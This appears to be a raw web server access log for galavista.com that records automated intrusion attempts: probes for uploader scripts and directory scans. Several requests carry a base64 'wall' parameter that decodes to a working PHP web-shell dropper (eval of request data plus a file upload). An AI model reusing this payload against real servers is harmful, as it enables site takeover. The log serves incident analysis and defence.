194.68.32.135 - - [01/Dec/2025:16:58:16 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"
194.68.32.135 - - [01/Dec/2025:16:58:17 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"
144.76.32.120 - - [01/Dec/2025:17:02:05 +0000] "GET /a839d/?zip=L2hvbWUvaTQ0MjUyNC9wdWJsaWNfaHRtbC9jZTY4NQ== HTTP/1.1" 200 16708 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
198.186.131.59 - - [01/Dec/2025:17:08:13 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2628.52 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:17:08:13 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2628.52 Safari/537.36"
34.11.93.219 - - [01/Dec/2025:17:08:57 +0000] "HEAD /blog/ HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Safari/537.36 OPR/106.0.0.0"
34.11.93.219 - - [01/Dec/2025:17:08:57 +0000] "HEAD /backup/ HTTP/1.1" 404 0 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/124.0.6367.56 Mobile/15E148 Safari/604.1"
34.11.93.219 - - [01/Dec/2025:17:08:57 +0000] "HEAD /wordpress/ HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36"
34.11.93.219 - - [01/Dec/2025:17:08:57 +0000] "HEAD /wp/ HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.140 Safari/537.36 Vivaldi/6.4.3160.47"
34.11.93.219 - - [01/Dec/2025:17:08:57 +0000] "HEAD /new/ HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
34.11.93.219 - - [01/Dec/2025:17:08:57 +0000] "HEAD /old/ HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.200 YaBrowser/24.1.0.0 Safari/537.36"
34.11.93.219 - - [01/Dec/2025:17:08:58 +0000] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.62 Safari/537.36"
194.68.32.135 - - [01/Dec/2025:17:16:44 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2816.81 Safari/537.36"
194.68.32.135 - - [01/Dec/2025:17:16:45 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2816.81 Safari/537.36"
43.133.69.37 - - [01/Dec/2025:16:55:57 +0000] "GET /straf/ HTTP/1.1" 200 670 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
194.68.32.135 - - [01/Dec/2025:16:58:27 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"
194.68.32.135 - - [01/Dec/2025:16:58:27 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"
49.51.178.45 - - [01/Dec/2025:17:14:46 +0000] "GET /1d2be/ HTTP/1.1" 200 752 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
194.68.32.135 - - [01/Dec/2025:17:16:43 +0000] "GET / HTTP/1.1" 200 1496 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2816.81 Safari/537.36"
194.68.32.135 - - [01/Dec/2025:17:16:43 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2816.81 Safari/537.36"
194.68.32.135 - - [01/Dec/2025:17:16:44 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2816.81 Safari/537.36"
192.121.16.196 - - [01/Dec/2025:17:26:20 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:49.0) Gecko/20100101 Firefox/49.0"
194.68.32.135 - - [01/Dec/2025:16:58:19 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"
144.76.32.120 - - [01/Dec/2025:17:02:05 +0000] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
170.106.84.136 - - [01/Dec/2025:17:05:36 +0000] "GET /?MA HTTP/1.1" 200 1474 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.186.131.59 - - [01/Dec/2025:17:08:03 +0000] "GET / HTTP/1.1" 200 1493 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2628.52 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:17:08:03 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2628.52 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:17:08:14 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2628.52 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:17:08:14 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2628.52 Safari/537.36"
170.106.167.214 - - [01/Dec/2025:17:23:05 +0000] "GET /d4fae/ HTTP/1.1" 200 1791 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
192.121.16.196 - - [01/Dec/2025:17:26:19 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:49.0) Gecko/20100101 Firefox/49.0"
216.73.216.189 - - [01/Dec/2025:17:33:32 +0000] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
43.157.158.178 - - [01/Dec/2025:17:33:44 +0000] "GET /19055/?path=/home/i442524 HTTP/1.1" 200 3050 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
192.121.16.196 - - [01/Dec/2025:17:35:18 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2727.8 Safari/537.36"
